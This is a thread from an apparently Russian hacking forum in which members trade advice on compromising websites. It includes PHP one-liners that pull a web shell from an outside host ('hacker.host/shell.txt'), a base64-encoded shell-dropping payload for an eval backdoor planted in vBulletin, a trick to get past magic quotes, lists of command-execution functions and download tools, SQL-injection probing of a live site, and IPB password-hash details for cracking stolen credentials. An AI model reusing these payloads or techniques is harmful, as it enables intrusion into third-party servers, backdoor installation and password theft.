Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    include()

    ps
    9000 пост ;)
     
  2. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    там блин такая булка, что авы выводяться вот типа так

    Code:
    http://ыыыы/image.php?u=124124&dateline=124124124
    + я думую что они проверяются там на пхп код.

    И удалённый инклуд запрещён.а юзать логи както извратно в данном случае..

    ЗЫ есть досутуп в админку, но както не получеться там uploder сделать =(
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ну удалённый то понятно.
    А вот как ты хотел то?
    Инклюд логами делай.
     
  4. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    зделать какуюнибудь качалку на пхп, аля :
    Code:
    <? $data = implode('',file('http://127.0.0.1/shell.txt')); $fp=fopen('./123.php','wb'); fputs($fp,$data); fclose($fp); ?>
    
     
    1 person likes this.
  5. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Лей шелл вот так:
    Code:
    <?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
    либо, если экранируются кавычки:
    Code:
    <?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
     
  6. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    shell_exec, popen, pcntl_exec.

    Кроме wget есть еще links, lynx, curl, GET, fetch
     
  7. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Спасибо, люди!
    Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Сам хз :)

    Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке
    Code:
    ID=1322879'
    выводит

    Сам хз :)

    Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке
    Code:
    ID=1322879'
    выводит

    Code:
    Server Error in '/' Application.
    Input string was not in a correct format. 
    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. 
    
    Exception Details: System.FormatException: Input string was not in a correct format.
    
    Source Error: 
    
    Line 139:        forumid = CLng(SafeHTML(Request.QueryString("forumid")))
    Line 140:        If mode = "edit" Then 
    Line 141:            forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
    Line 142:            arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
    Line 143:            If IsArray(arrTheArray) Then 
    
    
    Source File: не скажу :)   Line: 141 
    
    Stack Trace: 
    
    [FormatException: Input string was not in a correct format.]
       Microsoft.VisualBasic.CompilerServices.Conversions.ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
       Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +178
    
    [InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
       Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +714736
       ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
       System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +115
       System.Web.UI.Page.Render(HtmlTextWriter writer) +38
       System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240
    
    
    Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
     
  9. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
    спасибо
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    milw0rm.com в помощь :)
     
  11. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
    местоположение faq_comlete, код например
    при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал
    то заработало faq?e=phpinfo();

    Дайте пожалуйста чёткие указания, какой код вписать в faq.?e=
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
     
    1 person likes this.
  13. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    там магические кавычки в ON
     
  14. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    eval($_GET[e]);
    заменить на
    eval(stripslashes($_GET[e]));
     
  15. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0

    Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)

    Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
     
  16. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    вопрос был про повышение прав до пользователя,а не до рута,используя сплоиты с milw0rm.com.
    или я не то понял :confused:
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А root не пользователь? И поимев рута у тебя есть большая вероятность поиметь обычного пользователя.

    ЗЫ: и експлоиты не обязательно повышают права до рута...
     
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Как можно залить в IPB шелл и где в БД храняться хэши паролей?

    PS есть доступ на чтение БД
    Версия форума 2.3.6
     
    #8898 Byrger, 16 Sep 2009
    Last edited: 16 Sep 2009
  19. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    1) IPB 2.x.x - md5(md5($salt).md5($pass)), префикс - whb_, таблица - members_converge, salt - 5 символов

    2) https://forum.antichat.ru/threadedpost1095553.html
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Директива magic_quotes_gpc действует ТОЛЬКО на значения Get, Post и Cookie.
     
Thread Status:
Not open for further replies.